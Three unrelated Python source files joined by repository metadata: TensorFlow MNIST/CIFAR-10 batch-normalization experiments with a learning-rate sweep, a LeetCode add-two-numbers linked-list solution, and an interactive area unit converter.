            saver_path = tensorboard_dir + plan_tag + '_par/'
            if not os.path.exists(tensorboard_dir):
                os.makedirs(tensorboard_dir)
            '''writer = tf.summary.FileWriter(tensorboard_dir + plan_tag + '_train')
            writer_test = tf.summary.FileWriter(tensorboard_dir + plan_tag + '_test')
            merged_summary = tf.summary.merge_all()
            writer.add_graph(sess.graph)'''
            # RuntimeError: Graph is finalized and cannot be modified.
            # Freezing the graph here catches accidental op creation in the loop.
            sess.graph.finalize() # RuntimeError: Graph is finalized and cannot be modified.
            value_history = []
            for i in range(max_step+1):
                xb,yb = dataset.train.next_batch(n_batch)
                feed_dict_train = {self.x:xb, self.labels:yb, self.is_training:True,
                     self.learning_rate:learning_rate,
                     self.learning_rate_abph:self.learning_rate_ab}
                sess.run(self.training_op, feed_dict=feed_dict_train)
                if i%10 == 0:
                    try:
                        xt,yt = dataset.test.next_batch(n_batch)
                        feed_dict_test = {self.x:xt, self.labels:yt, self.is_training:False}
                        #train_loss, train_accu = sess.run((self.loss, self.accuracy),feed_dict=feed_dict_train)
                        #test_loss, test_accu = sess.run((self.loss,self.accuracy), feed_dict=feed_dict_test)
                        train_loss = sess.run(self.loss,feed_dict=feed_dict_train)
                        train_accu = sess.run(self.accuracy,feed_dict=feed_dict_train)
                        test_loss = sess.run(self.loss, feed_dict=feed_dict_test)
                        test_accu = sess.run(self.accuracy, feed_dict=feed_dict_test)
                        #value_history.append([train_loss, train_accu, test_loss, test_accu])
                        value_history.append([i,train_loss, train_accu, test_loss, test_accu])
                        print('%d : train_loss = %g, test_err = %g, train_accu = %g, test_accu = %g'
                              % (i,train_loss, test_loss, train_accu,test_accu))
                        '''s = sess.run(merged_summary, feed_dict=feed_dict_train)
                        writer.add_summary(s,i)
                        st = sess.run(merged_summary, feed_dict=feed_dict_test)
                        writer_test.add_summary(st,i)'''
                        #saver.save(sess, saver_path, global_step=i )
                        # NaN guard: NaN is the only float not equal to itself.
                        if train_loss != train_loss:
                            break
                    except:
                        # NOTE(review): bare except deliberately stops training on
                        # any evaluation failure, but it also hides real bugs —
                        # consider narrowing the exception types.
                        break
            saver.save(sess, saver_path, global_step=i )
            self.datafile = tensorboard_dir + plan_tag+'.dat'
            data_save(np.array(value_history),filename=self.datafile) # save
            self.value_history = value_history
            sess.close()
# # Model1 -- 2cnn + 2fc
class Model_mnist_gd(Model_mnist):
    """MNIST model with two 5x5 conv layers and two dense layers, plain SGD."""
    method = 'gd'
    def predict(self, x_image):
        """Build the conv/pool/dense forward graph; sets `self.logits` and `self.y`."""
        with tf.variable_scope(self.method):
            conv1 = tf.layers.conv2d(x_image, 32, kernel_size=[5,5], strides=[1,1],
                                     padding='SAME', activation=tf.nn.relu, name='layer1')
            down1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
            conv2 = tf.layers.conv2d(down1, 64, kernel_size=[5,5], strides=[1,1],
                                     padding='SAME', activation=tf.nn.relu, name='layer2')
            down2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
            n_flat = down2.get_shape()[1:4].num_elements()  # 7*7*64 = 3136
            flat = tf.reshape(down2, [-1, n_flat])
            dense1 = tf.layers.dense(flat, 1024, activation=tf.nn.relu, name='fc1')
            logits = tf.layers.dense(dense1, 10, activation=None, name='fc2')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model_mnist_bn(Model_mnist):
    """MNIST 2-conv + 2-fc model with batch normalization after every layer.

    Two wiring bugs fixed relative to the original graph:
    * `pool1` pooled `bn1` directly, so the first ReLU (`layer1`) was computed
      but never used;
    * the second ReLU read `bn1` instead of `bn2`, leaving `bn2` unused.
    """
    method = 'bn'
    def predict(self, x_image):
        """Build conv->BN->ReLU->pool (x2) then BN'd dense layers; sets logits/y."""
        with tf.variable_scope(self.method):
            hidden1 = tf.layers.conv2d(x_image, 32, kernel_size=[5,5],strides=[1,1],padding='SAME',
                                activation=None, name='hidden1')
            bn1 = tf.layers.batch_normalization(hidden1,training=self.is_training, momentum=0.9, name='bn1')
            layer1 = tf.nn.relu(bn1, name='layer1')
            # Fixed: pool the activated tensor, not the raw BN output.
            pool1 = tf.nn.max_pool(layer1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
            hidden2 = tf.layers.conv2d(pool1, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
                                activation=None, name='hidden2')
            bn2 = tf.layers.batch_normalization(hidden2,training=self.is_training, momentum=0.9, name='bn2')
            # Fixed: activate bn2 (was tf.nn.relu(bn1)).
            layer2 = tf.nn.relu(bn2)
            pool2 = tf.nn.max_pool(layer2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
            flat_shape = pool2.get_shape()[1:4].num_elements() # 7*7*64 = 3136
            flattened = tf.reshape(pool2, [-1, flat_shape])
            hidden3 = tf.layers.dense(flattened,1024,activation=None, name='fc1')
            bn3 = tf.layers.batch_normalization(hidden3,training=self.is_training, momentum=0.9, name='bn3')
            fc1 = tf.nn.relu(bn3)
            hidden4 = tf.layers.dense(fc1,10,activation=None, name='fc2')
            logits = tf.layers.batch_normalization(hidden4,training=self.is_training, momentum=0.9, name='bn4')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model_mnist_bn_split(Model_mnist_bn):
    """BN model whose batch-norm scale/shift variables train with their own learning rate."""
    method = 'bn_split'
    def optimizer(self):
        """Build two SGD ops: one for ordinary weights, one (rate `learning_rate_abph`) for BN variables."""
        learning_rate_ab = self.learning_rate_abph
        learning_rate = self.learning_rate
        bn_vars = tf.trainable_variables(scope='bn_split/bn')
        other_vars = list(set(tf.trainable_variables()) - set(bn_vars))
        list1, list2 = other_vars, bn_vars
        print(list1,list2)
        with tf.name_scope("train"):
            sgd_main = tf.train.GradientDescentOptimizer(learning_rate)
            self.training_op1 = sgd_main.minimize(self.loss, var_list=list1)
            sgd_bn = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
            # BN moving-average updates are tied to the BN-variable step only.
            extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
            with tf.control_dependencies(extra_update_ops):
                self.training_op2 = sgd_bn.minimize(self.loss, var_list=list2)
            self.training_op = (self.training_op1, self.training_op2)
# # Model2 -- 1fc -- one layer
class Model2_mnist_gd(Model_mnist):
    """Single fully-connected softmax layer on the flattened image, plain SGD."""
    method = 'gd'
    def predict(self, x_image):
        x = self.x  # operates on the raw flat input, not x_image
        with tf.variable_scope(self.method):
            n_pixels = self.image_size * self.image_size
            flat = tf.reshape(x, [-1, n_pixels])
            logits = tf.layers.dense(flat, 10, activation=None, name='fc')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model2_mnist_bn(Model_mnist):
    """Single dense layer followed by batch normalization on the logits."""
    method = 'bn'
    def predict(self, x_image):
        x = self.x  # operates on the raw flat input, not x_image
        with tf.variable_scope(self.method):
            n_pixels = self.image_size * self.image_size
            flat = tf.reshape(x, [-1, n_pixels])
            pre_bn = tf.layers.dense(flat, 10, activation=None, name='fc')
            logits = tf.layers.batch_normalization(pre_bn, training=self.is_training, momentum=0.9, name='bn')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model2_mnist_bn_split(Model2_mnist_bn):
    """One-layer BN model whose batch-norm variables train with their own learning rate."""
    method = 'bn_split'
    def optimizer(self):
        """Build two SGD ops: one for ordinary weights, one (rate `learning_rate_abph`) for BN variables."""
        learning_rate_ab = self.learning_rate_abph
        learning_rate = self.learning_rate
        bn_vars = tf.trainable_variables(scope='bn_split/bn')
        other_vars = list(set(tf.trainable_variables()) - set(bn_vars))
        list1, list2 = other_vars, bn_vars
        print(list1,list2)
        with tf.name_scope("train"):
            sgd_main = tf.train.GradientDescentOptimizer(learning_rate)
            self.training_op1 = sgd_main.minimize(self.loss, var_list=list1)
            sgd_bn = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
            # BN moving-average updates are tied to the BN-variable step only.
            extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
            with tf.control_dependencies(extra_update_ops):
                self.training_op2 = sgd_bn.minimize(self.loss, var_list=list2)
            self.training_op = (self.training_op1, self.training_op2)
# # Model3 -- 2cnn(3) + 3fc
class Model3_mnist_gd(Model_mnist):
    """MNIST model with two 3x3 conv layers and three dense layers, plain SGD."""
    method = 'gd'
    def predict(self, x_image):
        """Build the conv/pool/dense forward graph; sets `self.logits` and `self.y`."""
        with tf.variable_scope(self.method):
            conv1 = tf.layers.conv2d(x_image, 32, kernel_size=[3,3], strides=[1,1],
                                     padding='SAME', activation=tf.nn.relu, name='layer1')
            down1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
            conv2 = tf.layers.conv2d(down1, 64, kernel_size=[3,3], strides=[1,1],
                                     padding='SAME', activation=tf.nn.relu, name='layer2')
            down2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
            n_flat = down2.get_shape()[1:4].num_elements()  # 7*7*64 = 3136
            flat = tf.reshape(down2, [-1, n_flat])
            dense1 = tf.layers.dense(flat, 512, activation=tf.nn.relu, name='fc1')
            dense2 = tf.layers.dense(dense1, 128, activation=tf.nn.relu, name='fc2')
            logits = tf.layers.dense(dense2, 10, activation=None, name='fc3')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model3_mnist_bn(Model_mnist):
    """MNIST 2-conv(3x3) + 3-fc model with batch normalization after every layer.

    Two wiring bugs fixed relative to the original graph:
    * `pool1` pooled `bn1` directly, so the first ReLU (`layer1`) was computed
      but never used;
    * the second ReLU read `bn1` instead of `bn2`, leaving `bn2` unused.
    """
    method = 'bn'
    def predict(self, x_image):
        """Build conv->BN->ReLU->pool (x2) then BN'd dense layers; sets logits/y."""
        with tf.variable_scope(self.method):
            hidden1 = tf.layers.conv2d(x_image, 32, kernel_size=[3,3],strides=[1,1],padding='SAME',
                                activation=None, name='hidden1')
            bn1 = tf.layers.batch_normalization(hidden1,training=self.is_training, momentum=0.9, name='bn1')
            layer1 = tf.nn.relu(bn1, name='layer1')
            # Fixed: pool the activated tensor, not the raw BN output.
            pool1 = tf.nn.max_pool(layer1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
            hidden2 = tf.layers.conv2d(pool1, 64, kernel_size=[3,3],strides=[1,1],padding='SAME',
                                activation=None, name='hidden2')
            bn2 = tf.layers.batch_normalization(hidden2,training=self.is_training, momentum=0.9, name='bn2')
            # Fixed: activate bn2 (was tf.nn.relu(bn1)).
            layer2 = tf.nn.relu(bn2)
            pool2 = tf.nn.max_pool(layer2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
            flat_shape = pool2.get_shape()[1:4].num_elements() # 7*7*64 = 3136
            flattened = tf.reshape(pool2, [-1, flat_shape])
            hidden3 = tf.layers.dense(flattened,512,activation=None, name='fc1')
            bn3 = tf.layers.batch_normalization(hidden3,training=self.is_training, momentum=0.9, name='bn3')
            fc1 = tf.nn.relu(bn3)
            hidden4 = tf.layers.dense(fc1,128,activation=None, name='fc2')
            bn4 = tf.layers.batch_normalization(hidden4,training=self.is_training, momentum=0.9, name='bn4')
            fc2 = tf.nn.relu(bn4)
            hidden5 = tf.layers.dense(fc2,10,activation=None, name='fc3')
            logits = tf.layers.batch_normalization(hidden5,training=self.is_training, momentum=0.9, name='bn5')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model3_mnist_bn_split(Model3_mnist_bn):
    """Model3 BN variant whose batch-norm variables train with their own learning rate."""
    method = 'bn_split'
    def optimizer(self):
        """Build two SGD ops: one for ordinary weights, one (rate `learning_rate_abph`) for BN variables."""
        learning_rate_ab = self.learning_rate_abph
        learning_rate = self.learning_rate
        bn_vars = tf.trainable_variables(scope='bn_split/bn')
        other_vars = list(set(tf.trainable_variables()) - set(bn_vars))
        list1, list2 = other_vars, bn_vars
        print(list1,list2)
        with tf.name_scope("train"):
            sgd_main = tf.train.GradientDescentOptimizer(learning_rate)
            self.training_op1 = sgd_main.minimize(self.loss, var_list=list1)
            sgd_bn = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
            # BN moving-average updates are tied to the BN-variable step only.
            extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
            with tf.control_dependencies(extra_update_ops):
                self.training_op2 = sgd_bn.minimize(self.loss, var_list=list2)
            self.training_op = (self.training_op1, self.training_op2)
# # Model4 -- 1fc -- one layer, quadratic
class Model4_mnist_gd(Model2_mnist_gd):
    """One-layer softmax model trained with a quadratic (MSE) loss instead of cross-entropy."""
    def loss(self, labels):
        """Attach the mean squared error between `labels` and the softmax output."""
        self.labels = labels
        squared_error = (labels - self.y) ** 2
        self.loss = tf.reduce_mean(squared_error, name="loss")
class Model4_mnist_bn(Model2_mnist_bn):
    """One-layer BN model trained with a quadratic (MSE) loss instead of cross-entropy."""
    def loss(self, labels):
        """Attach the mean squared error between `labels` and the softmax output."""
        self.labels = labels
        squared_error = (labels - self.y) ** 2
        self.loss = tf.reduce_mean(squared_error, name="loss")
#class Model4_mnist_bn_split(Model2_mnist_bn)
class Model4_mnist_bn_split(Model2_mnist_bn_split):
    """One-layer split-rate BN model trained with a quadratic (MSE) loss."""
    def loss(self, labels):
        """Attach the mean squared error between `labels` and the softmax output."""
        self.labels = labels
        squared_error = (labels - self.y) ** 2
        self.loss = tf.reduce_mean(squared_error, name="loss")
# # Model5 -- 2fc -- one+one layer, quadratic
class Model5_mnist_gd(Model4_mnist_gd):
    """Two-layer (hidden ReLU + softmax) MNIST model with quadratic loss, plain SGD."""
    def predict(self, x_image):
        x = self.x  # operates on the raw flat input, not x_image
        with tf.variable_scope(self.method):
            n_pixels = self.image_size * self.image_size
            flat = tf.reshape(x, [-1, n_pixels])
            hidden_act = tf.layers.dense(flat, self.hidden_size, activation=tf.nn.relu, name='fc1')
            logits = tf.layers.dense(hidden_act, 10, activation=None, name='fc')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model5_mnist_bn(Model4_mnist_bn):
    """Two-layer MNIST model with batch norm on both layers and quadratic loss."""
    def predict(self, x_image):
        x = self.x  # operates on the raw flat input, not x_image
        with tf.variable_scope(self.method):
            n_pixels = self.image_size * self.image_size
            flat = tf.reshape(x, [-1, n_pixels])
            pre1 = tf.layers.dense(flat, self.hidden_size, activation=None, name='fc1')
            bn1 = tf.layers.batch_normalization(pre1, training=self.is_training, momentum=0.9, name='bn1')
            act1 = tf.nn.relu(bn1, name='layer1')
            pre2 = tf.layers.dense(act1, 10, activation=None, name='fc2')
            logits = tf.layers.batch_normalization(pre2, training=self.is_training, momentum=0.9, name='bn2')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model5_mnist_bn_split(Model5_mnist_bn):
    """Model5 BN variant whose batch-norm variables train with their own learning rate."""
    method = 'bn_split'
    def optimizer(self):
        """Build two SGD ops: one for ordinary weights, one (rate `learning_rate_abph`) for BN variables."""
        learning_rate_ab = self.learning_rate_abph
        learning_rate = self.learning_rate
        bn_vars = tf.trainable_variables(scope='bn_split/bn')
        other_vars = list(set(tf.trainable_variables()) - set(bn_vars))
        list1, list2 = other_vars, bn_vars
        print(list1,list2)
        with tf.name_scope("train"):
            sgd_main = tf.train.GradientDescentOptimizer(learning_rate)
            self.training_op1 = sgd_main.minimize(self.loss, var_list=list1)
            sgd_bn = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
            # BN moving-average updates are tied to the BN-variable step only.
            extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
            with tf.control_dependencies(extra_update_ops):
                self.training_op2 = sgd_bn.minimize(self.loss, var_list=list2)
            self.training_op = (self.training_op1, self.training_op2)
# # Model_cifar10
class Model_cifar10(Model_mnist):
    # CIFAR-10 variant: same training machinery as Model_mnist, different input geometry.
    image_size = 32      # CIFAR-10 images are 32x32
    image_channel = 3    # RGB
    name = 'cifar10'
class Model_cifar10_gd(Model_cifar10):
    """CIFAR-10 model with two 5x5 conv layers (3x3 pooling) and three dense layers, plain SGD."""
    method = 'gd'
    def predict(self, x_image):
        """Build the conv/pool/dense forward graph; sets `self.logits` and `self.y`."""
        with tf.variable_scope(self.method):
            conv1 = tf.layers.conv2d(x_image, 64, kernel_size=[5,5], strides=[1,1],
                                     padding='SAME', activation=tf.nn.relu, name='layer1')
            down1 = tf.nn.max_pool(conv1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
            conv2 = tf.layers.conv2d(down1, 64, kernel_size=[5,5], strides=[1,1],
                                     padding='SAME', activation=tf.nn.relu, name='layer2')
            down2 = tf.nn.max_pool(conv2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
            n_flat = down2.get_shape()[1:4].num_elements()  # 8*8*64
            flat = tf.reshape(down2, [-1, n_flat])
            dense1 = tf.layers.dense(flat, 512, activation=tf.nn.relu, name='fc1')
            dense2 = tf.layers.dense(dense1, 128, activation=tf.nn.relu, name='fc2')
            logits = tf.layers.dense(dense2, 10, activation=None, name='fc3')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model_cifar10_bn(Model_cifar10):
    """CIFAR-10 2-conv + 3-fc model with batch normalization after every layer.

    Two wiring bugs fixed relative to the original graph:
    * `pool1` pooled `bn1` directly, so the first ReLU (`layer1`) was computed
      but never used;
    * the second ReLU read `bn1` instead of `bn2`, leaving `bn2` unused.
    """
    method = 'bn'
    def predict(self, x_image):
        """Build conv->BN->ReLU->pool (x2) then BN'd dense layers; sets logits/y."""
        with tf.variable_scope(self.method):
            hidden1 = tf.layers.conv2d(x_image, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
                                activation=None, name='hidden1')
            bn1 = tf.layers.batch_normalization(hidden1,training=self.is_training, momentum=0.9, name='bn1')
            layer1 = tf.nn.relu(bn1, name='layer1')
            # Fixed: pool the activated tensor, not the raw BN output.
            pool1 = tf.nn.max_pool(layer1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME', name='pool1')
            hidden2 = tf.layers.conv2d(pool1, 64, kernel_size=[5,5],strides=[1,1],padding='SAME',
                                activation=None, name='hidden2')
            bn2 = tf.layers.batch_normalization(hidden2,training=self.is_training, momentum=0.9, name='bn2')
            # Fixed: activate bn2 (was tf.nn.relu(bn1)).
            layer2 = tf.nn.relu(bn2)
            pool2 = tf.nn.max_pool(layer2, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding='SAME')
            flat_shape = pool2.get_shape()[1:4].num_elements() # 8*8*64
            flattened = tf.reshape(pool2, [-1, flat_shape])
            hidden3 = tf.layers.dense(flattened,512,activation=None, name='fc1')
            bn3 = tf.layers.batch_normalization(hidden3,training=self.is_training, momentum=0.9, name='bn3')
            fc1 = tf.nn.relu(bn3)
            hidden4 = tf.layers.dense(fc1,128,activation=None, name='fc2')
            bn4 = tf.layers.batch_normalization(hidden4,training=self.is_training, momentum=0.9, name='bn4')
            fc2 = tf.nn.relu(bn4)
            hidden5 = tf.layers.dense(fc2,10,activation=None, name='fc3')
            logits = tf.layers.batch_normalization(hidden5,training=self.is_training, momentum=0.9, name='bn5')
            tf.summary.histogram('logits', logits)
            self.logits = logits
            self.y = tf.nn.softmax(logits)
class Model_cifar10_bn_split(Model_cifar10_bn):
    """CIFAR-10 BN model whose batch-norm variables train with their own learning rate."""
    method = 'bn_split'
    def optimizer(self):
        """Build two SGD ops: one for ordinary weights, one (rate `learning_rate_abph`) for BN variables."""
        learning_rate_ab = self.learning_rate_abph
        learning_rate = self.learning_rate
        bn_vars = tf.trainable_variables(scope='bn_split/bn')
        other_vars = list(set(tf.trainable_variables()) - set(bn_vars))
        list1, list2 = other_vars, bn_vars
        print(list1,list2)
        with tf.name_scope("train"):
            sgd_main = tf.train.GradientDescentOptimizer(learning_rate)
            self.training_op1 = sgd_main.minimize(self.loss, var_list=list1)
            sgd_bn = tf.train.GradientDescentOptimizer(learning_rate=learning_rate_ab)
            # BN moving-average updates are tied to the BN-variable step only.
            extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
            with tf.control_dependencies(extra_update_ops):
                self.training_op2 = sgd_bn.minimize(self.loss, var_list=list2)
            self.training_op = (self.training_op1, self.training_op2)
class Model_cifar10_adam(Model_cifar10_gd):
    # NOTE(review): this overrides `name` (the dataset tag used in prints and
    # filenames) rather than `method` (the tag used for variable scopes and run
    # names, still 'gd' here). It looks like `method = 'adam'` may have been
    # intended — confirm before changing, since `method` names variable scopes.
    name = 'adam'
    def optimizer(self):
        # Same structure as the base optimizer, but with Adam instead of plain SGD.
        learning_rate = self.learning_rate
        with tf.name_scope("train"):
            optimizer = tf.train.AdamOptimizer(learning_rate)
            #optimizer = tf.train.GradientDescentOptimizer(learning_rate)
            # Run batch-norm update ops before each training step.
            extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
            print(extra_update_ops)
            with tf.control_dependencies(extra_update_ops):
                self.training_op = optimizer.minimize(self.loss)
# # Test
class Test(object):
    """Learning-rate sweep harness: trains a model per rate, collects and plots metrics."""
    def test_lr(self, model, dataset,lr_list, n_batch=100,max_step=1000, logdir='../Results/'):
        """Train `model` once per learning rate in `lr_list`; store histories and data files."""
        model.set_tensorboard(logdir)
        value_history = []
        datafiles = []
        for learning_rate in lr_list:
            model.train(dataset=dataset,
                learning_rate=learning_rate,
                n_batch=n_batch,max_step=max_step)
            value_history.append(model.value_history)
            datafiles.append(model.datafile)
        self.lr_list = lr_list
        self.value_history = value_history
        self.datafiles = datafiles
        print(datafiles)
    def value_check(self):
        """Pack the ragged per-run histories into one NaN-padded (runs, steps, 5) array."""
        n = len(self.value_history)
        m = max([len(vh) for vh in self.value_history])
        # Rows: [step, train_loss, train_accu, test_loss, test_accu]; short runs stay NaN.
        value_history = np.nan * np.ones([n,m,5])
        for ni in range(n):
            mi = len(self.value_history[ni])
            value_history[ni,:mi,:] = np.array(self.value_history[ni])
        self.value_history_np = value_history
    def load_value_history(self):
        # Placeholder: reloading saved histories is not implemented.
        pass
    def plot_lr(self,step=10):
        """Plot loss (left) and accuracy (right) vs learning rate at row `step`.

        NOTE(review): the left subplot uses a linear x-axis while the right one
        mixes `semilogx` and `plot` — confirm the intended axis scales.
        """
        value_history = self.value_history_np
        x = self.lr_list
        #step = 10
        plt.figure(figsize=[20,5])
        plt.subplot(121)
        plt.plot(x,value_history[:,step,1],'b-')
        plt.plot(x,value_history[:,step,3],'r-')
        #plt.xlim([0,10])
        plt.xlabel('learning rate')
        plt.ylabel('loss at step=%d'%step);
        plt.legend(('train','test'))
        plt.subplot(122)
        plt.semilogx(x,value_history[:,step,2],'b-')
        plt.plot(x,value_history[:,step,4],'r-')
        #plt.xlim([0,10])
        plt.xlabel('learning rate')
        plt.ylabel('accuracy at step=%d'%step);
        plt.legend(('train','test'))
#import numpy as np
import scipy as scipy
#from tensorflow.examples.tutorials.mnist import input_data
#mnist = input_data.read_data_sets("MNIST_data", one_hot=True)
def imresize(x,size): # resize one image such as 28*28 --> 20*20
    """Resize a single 2-D image to `size` and return it as float32 in [0, 1].

    NOTE(review): scipy.misc.imresize was deprecated in SciPy 1.0 and removed
    in 1.3 — this only runs on older SciPy (PIL-backed); a replacement would
    need Pillow or skimage.
    """
    xr = scipy.misc.imresize(x,size)
    #return np.array(xr,dtype='float32')
    # imresize returns uint8 0..255; rescale back to unit-range floats.
    return np.array(xr,dtype='float32') / 255.0
def imresize_mnist_batch(xb,size): # resize image batch
    """Resize a batch of flattened 28x28 MNIST images to `size`, keeping them flat."""
    source_shape = [28, 28]
    target_len = size[0] * size[1]
    resized = np.zeros([len(xb), target_len])
    for row, flat_img in enumerate(xb):
        img = flat_img.reshape(source_shape)
        resized[row, :] = imresize(img, size).reshape([1, target_len])
    return resized
class mnist_resized():
    """Wraps one split (train/test) of an mnist dataset, resizing every batch it yields."""
    def __init__(self,mnist, trainORtest,size,**args):
        self.trainORtest = trainORtest
        self.size = size
        # 0 selects the train split, 1 the test split.
        self.func = (mnist.train.next_batch, mnist.test.next_batch)[trainORtest]
    def next_batch(self,n_batch):
        """Fetch a batch from the wrapped split and resize its images to `self.size`."""
        images, labels = self.func(n_batch)
        return imresize_mnist_batch(images, self.size), labels
class dataset_mnist_resized():
    """Dataset facade exposing resized `train`/`test` splits like the original mnist object."""
    def __init__(self, mnist, size, **args):
        self.train = mnist_resized(mnist, 0, size)
        self.test = mnist_resized(mnist, 1, size)
#dataset2 = dataset_mnist_resized(mnist, [22,22])
#xb,yb = dataset2.train.next_batch(3)
#xt,yt = dataset2.test.next_batch(4)
#xb.shape,yb.shape, xt.shape,yt.shape | [
"noreply@github.com"
] | Lightmann.noreply@github.com |
f8402862660ad7fbd0eaa5701600977ee84be1b3 | 3ef1689e0bc15c6928df73768a53fc831811a7cd | /2.add-two-numbers.py | f9ebe10af8d681949ace78d9113b832d94dbc384 | [] | no_license | liruochen1998/lc | 4b32d9ce05048858628ae6163cc0f3487223b666 | 8a04c6c53feaefed6376c70cf8063a300a3b85b0 | refs/heads/master | 2020-04-30T09:27:41.850579 | 2019-09-23T00:18:06 | 2019-09-23T00:18:06 | 176,747,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,016 | py | #
# @lc app=leetcode id=2 lang=python
#
# [2] Add Two Numbers
#
# https://leetcode.com/problems/add-two-numbers/description/
#
# algorithms
# Medium (30.60%)
# Total Accepted: 795.2K
# Total Submissions: 2.6M
# Testcase Example: '[2,4,3]\n[5,6,4]'
#
# You are given two non-empty linked lists representing two non-negative
# integers. The digits are stored in reverse order and each of their nodes
# contain a single digit. Add the two numbers and return it as a linked list.
#
# You may assume the two numbers do not contain any leading zero, except the
# number 0 itself.
#
# Example:
#
#
# Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)
# Output: 7 -> 0 -> 8
# Explanation: 342 + 465 = 807.
#
#
#
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
    def addTwoNumbers(self, l1, l2):
        """
        :type l1: ListNode
        :type l2: ListNode
        :rtype: ListNode

        Walk both lists in lockstep, summing digit pairs plus the carry, and
        build the result behind a dummy head so the first node needs no
        special-casing.  O(max(m, n)) time, O(1) extra space besides the output.
        (`ListNode` is provided by the LeetCode judge environment.)
        """
        dummy = ListNode(0)
        tail = dummy
        carry = 0
        while l1 or l2 or carry:
            total = carry
            if l1:
                total += l1.val
                l1 = l1.next
            if l2:
                total += l2.val
                l2 = l2.next
            carry, digit = divmod(total, 10)
            tail.next = ListNode(digit)
            tail = tail.next
        return dummy.next
| [
"liruochenv@gmail.com"
] | liruochenv@gmail.com |
00609455e8b9cf838c4f51da7dbb1f2d844d980a | 37bdd47e37ba53bc856b90d2ed313ef6a9446321 | /main/AREA/area.py | 293ceda6e4fc572dffbce9709237b9b4851c01aa | [
"BSD-3-Clause"
] | permissive | TSG405/Unit-Converter | 07823a4be4a3d4314693473ce79c39edd65eb6c6 | 98bdedc8130614ef41ba775b67488fb93df4b2da | refs/heads/main | 2023-02-19T09:09:13.636394 | 2021-01-10T07:20:25 | 2021-01-10T07:20:25 | 322,889,559 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | # LOGICAL FUNCTION
def convert_SI(val, unit_in, unit_out):
    """Convert an area `val` from `unit_in` to `unit_out` (unit codes keyed below)."""
    # Conversion factors from each supported unit to square metres.
    SI = {'s-km':1000000, 's-mile':2590000, 's-m':1.0, 'hectare':10000, 's-yard': 0.836127, 's-ft': 0.092903, 's-in': 0.00064516, 'acre': 4046.86}
    factor_in = SI[unit_in]
    factor_out = SI[unit_out]
    return float(val * factor_in / factor_out)
# DRIVER FUNCTION
def temp():
    """Interactive loop: prompt for unit codes and an amount, print the conversion.

    Rewritten from the original recursive retry scheme: each recursive retry
    call also *fell back into* the broken outer invocation afterwards (double
    prompts, KeyError on stale unit codes), and repeated retries grew the call
    stack.  Invalid input now simply restarts the prompt loop, and declining
    another round returns instead of calling exit().
    """
    tsg = ['s-km','s-mile','s-m','hectare','s-yard','s-ft','s-in','acre']
    while True:
        print("\n\n-----------------------------------------------------------------------------")
        print("LIST OF AVAILABLE UNITS OF AREA --")
        print("* SQUARE-METERS -- s-m [CODE]")
        print("* SQUARE-MILE -- s-mile [CODE]")
        print("* SQUARE-KILOMETERS -- s-km [CODE]")
        print("* HECTARES -- hectare [CODE]")
        print("* SQUARE-YARDS -- s-yard [CODE]")
        print("* SQUARE-FOOT -- s-ft [CODE]")
        print("* SQUARE-INCH -- s-in [CODE]")
        print("* ACRES -- acre [CODE]")
        print("-----------------------------------------------------------------------------")
        unit_in = input("\nFROM UNIT [CODE]-- \t")
        if unit_in not in tsg:
            print("ENTER THE CODE CORRECTLY!")
            continue
        unit_out = input("TO UNIT [CODE]-- \t")
        if unit_out not in tsg:
            print("ENTER THE CODE CORRECTLY!")
            continue
        try:
            amount = float(input("ENTER THE AMOUNT --\t"))
        except ValueError:  # narrowed from a bare except: only the float() parse can fail here
            print("\nENTER THE AMOUNT CORRECTLY!!")
            continue
        res = convert_SI(amount, unit_in, unit_out)
        print("\n------***------------***------")
        print("{} {} = {} {}".format(amount, unit_in, res, unit_out))
        print("------***------------***------\n")
